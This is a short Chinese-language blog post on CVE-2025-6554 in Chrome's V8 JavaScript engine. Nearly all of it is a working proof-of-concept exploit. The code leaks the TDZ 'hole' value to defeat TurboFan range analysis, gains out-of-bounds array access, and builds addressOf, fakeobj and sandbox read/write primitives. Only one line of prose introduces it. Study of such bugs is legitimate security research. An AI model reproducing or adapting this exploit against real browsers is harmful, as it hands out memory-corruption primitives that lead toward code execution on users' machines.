CVE-2025-6554

前言

非常著名的洞,学习了一下。通过TDZ leak hole,然后巧妙的通过hole的特性绕过turbofan,先给一个poc

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
var buf = new ArrayBuffer(8);
var f32 = new Float32Array(buf);
var f64 = new Float64Array(buf);
var u8 = new Uint8Array(buf);
var u16 = new Uint16Array(buf);
var u32 = new Uint32Array(buf);
var u64 = new BigUint64Array(buf);

function lh_u32_to_f64(l,h){
    u32[0] = l;
    u32[1] = h;
    return f64[0];
}
function f64_to_u32l(val){
    f64[0] = val;
    return u32[0];
}
function f64_to_u32h(val){
    f64[0] = val;
    return u32[1];
}
function f64_to_u64(val){
    f64[0] = val;
    return u64[0];
}
function u64_to_f64(val){
    u64[0] = val;
    return f64[0];
}

function u64_to_u32_lo(val){
    u64[0] = val;
    return u32[0];
}

function u64_to_u32_hi(val){
    u64[0] = val;
    return u32[1];
}

function stop(){
    %SystemBreak();
}

function p(arg){
    %DebugPrint(arg);
}

function spin(){
    console.log("spin...");
    stop();
}

function stuck(){
    console.log("readline....");
    readline();
}

function hex(str){
    return str.toString(16).padStart(16,0);
}

function logg(str,val){
    console.log("[+] "+ str + ": " + "0x" + hex(val));
}

function opt(trigger) {
  let x;
  delete x?.[y]?.a;
  let hole = y;
  let y;
  let o = {};
  o.maybe_hole = trigger ? hole : "not the hole";
  //inferred: (0, 535870888) actual:   (-524289, 535870888) 
  let len = o.maybe_hole.length;
  var _oob_aar = new Array(8);
  _oob_aar[0] = 1.1;
  //inferred: (0, 1) actual:   (-1, 1)
  let sign_val = Math.sign(len);
  //inferred: (0, 1) actual:   (0, 2)
  let v1 = 2 - (sign_val + 1);
  //inferred: (0, 0) actual:   (-1, 0)
  let v2 = (9 - (v1 + 8)) >> 1;
  //inferred: (1, 1) actual:   (0, 1)
  let v3 = v2 + 1;
  //inferred: (1000, 1000) actual:   (0, 1000)
  let idx = v3 * 1000;
  _oob_aar[idx] = 1.1;
  let _obj_arr = [{}];
  let _rw_arr = [1.1];
  return [_oob_aar, _obj_arr, _rw_arr];
}

for (let i = 0; i < 10000; i++){
    opt(false);opt(false);opt(false);
    opt(false);opt(false);opt(false);
}

var [oob_aar, obj_arr, rw_arr] = opt(true);
// p(oob_aar);
// p(obj_arr);
// p(rw_arr);

function addressOf(obj){
  obj_arr[0] = obj;
  return f64_to_u32h(oob_aar[14]);
}

function fakeobj(addr){
    oob_aar[14] = lh_u32_to_f64(2, addr);
    return obj_arr[0];
}

function cage_read(addr){
    oob_aar[20] = lh_u32_to_f64(addr - 8, 0x2);
    // stop();
    return f64_to_u64(rw_arr[0]);
}

function cage_wtite(addr, val){
    oob_aar[20] = lh_u32_to_f64(addr - 8, 0x2);
    rw_arr[0] = u64_to_f64(val);
}

stop();
v8
#v8,TheHole
CVE-2025-6554
http://example.com/2025/10/13/CVE-2025-6554/
作者
flyyy
发布于
2025年10月13日
许可协议